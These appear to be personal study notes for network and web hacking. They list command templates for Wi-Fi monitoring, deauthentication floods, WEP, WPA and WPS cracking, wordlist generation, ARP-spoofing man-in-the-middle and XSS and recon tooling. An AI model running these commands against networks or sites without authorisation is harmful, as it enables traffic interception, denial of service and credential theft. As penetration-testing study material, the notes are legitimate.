
Contains non relevant info that I wanna dump


Contains non relevant info that I wanna dump

Table of Content

  1. Network Hacking
    1. Pre-connection Attack
    2. Gaining Access
    3. Post-connection Attack
  2. Gaining Access
  3. Post exploitation
  4. Website Hacking

iwconfig : Gived info about wireless adapter
ifconfig [interface name] down/up : Make the interface up/down
airmon-ng check kill
iwconfig [interface-name] mode monitor : Changes wireless mode from managed to monitor
ifconfig [interface-name] hw ether [Your_Desired_MAC_Adress]

Network Hacking

airodump-ng : Used by wireless interface in monitor mode to capture packet

airodump-ng [interface-name] : Sniffs all the wireless network around with their protection level(Open/WEP/WPA/WPA2) and other critical info

airodump-ng --band [a,b,g,n] [interface-name] : capture packet in band specified

airodump-ng --bssid [bssid] --channel [channel number] --write [filename] [interface-name]

aireplay-ng --deauth  100000 -a [access mac] -c [client mac] [interface-name] : Disable a user from using wi-fi

aircrack-ng : Used to crack WEP(IV + key)

aircrack-ng [cap-file-name]

aireplay-ng : Used to generate fake traffic. It comes handy if target wifi is not generating enough traffic

aireplay-ng --fakeauth 0 -a [mac-of-AP] -h [mac-of wireless-adapter] [interface-name] : For assocaiation
aireplay-ng --arpreplay  -b [mac-of-AP] -h [mac-of wireless-adapter] [interface-name]

Cracking WPA/WPA2

Only difference in encrption used for message integrity WPA: TKIP WPA2: CCMP

WPS: Can be exploited. It was designed to simplify connecting to wireless. Only way to prevent against this is enabling PBC(Push button connect)

wash --interface [interface-name] : Shows all the wifi with wps enabled
reaver --bssid [bssid] --channel [channel number] --interface [interface-name] -vvv --no-associate : Bruteforce 8 bit WPS pin which is then used to compute WPA Passkey

Wordlist Attack

MIC of handshake + word list 
aircrack-ng [handshake-capture-file]-w [wordlist] 

Creating Wordlist

crunch [min] [max] [character] -t [pattern] -o [filename]

NetDiscover and Nmap

netdiscover -r [range-of-ip] : IPs and Vendor of devices connected to the same network

Nmap: Gives information about open port, operating system and running services. Zenmap: GUI warpper over Nmap

MITM Attack

Multiple ways to attain this. One way is ARP spoofing.

arpspoof -i [interface-name] -t [target_ip] [gateway_ip] arpspoof -i [interface-name] -t [gateway_ip] [target_ip]

After these two commands, arp is spoofed but still we has to force out computer to work as router echo 1 > /proc/sys/ipv4/ip_forward

BetterCap: better than arpspoof.

Gaining Access

Post Exploitation

The things which can be done after gaining access to target system.

keyloggers, opening webcam, using it as pivot

Website Hacking


Persistent XSS : Stored in DB Reflected XSS : Run on a specific URL DOM based XSS :

Beef : Used for XSS attack

ZAP : Zed attach proxy

Automatically find vulnerabilities in web application.

Information Gathering

knock : Find subdomain of target
drib [url] [wordlist] : Web Content server tool to  collect infomration about files on server

ip: [ip] : to get list of all websites on server.

Best website for info-gathering:

  1. https://www.robtex.com/
  2. http://whois.domaintools.com/
  3. https://sitereport.netcraft.com/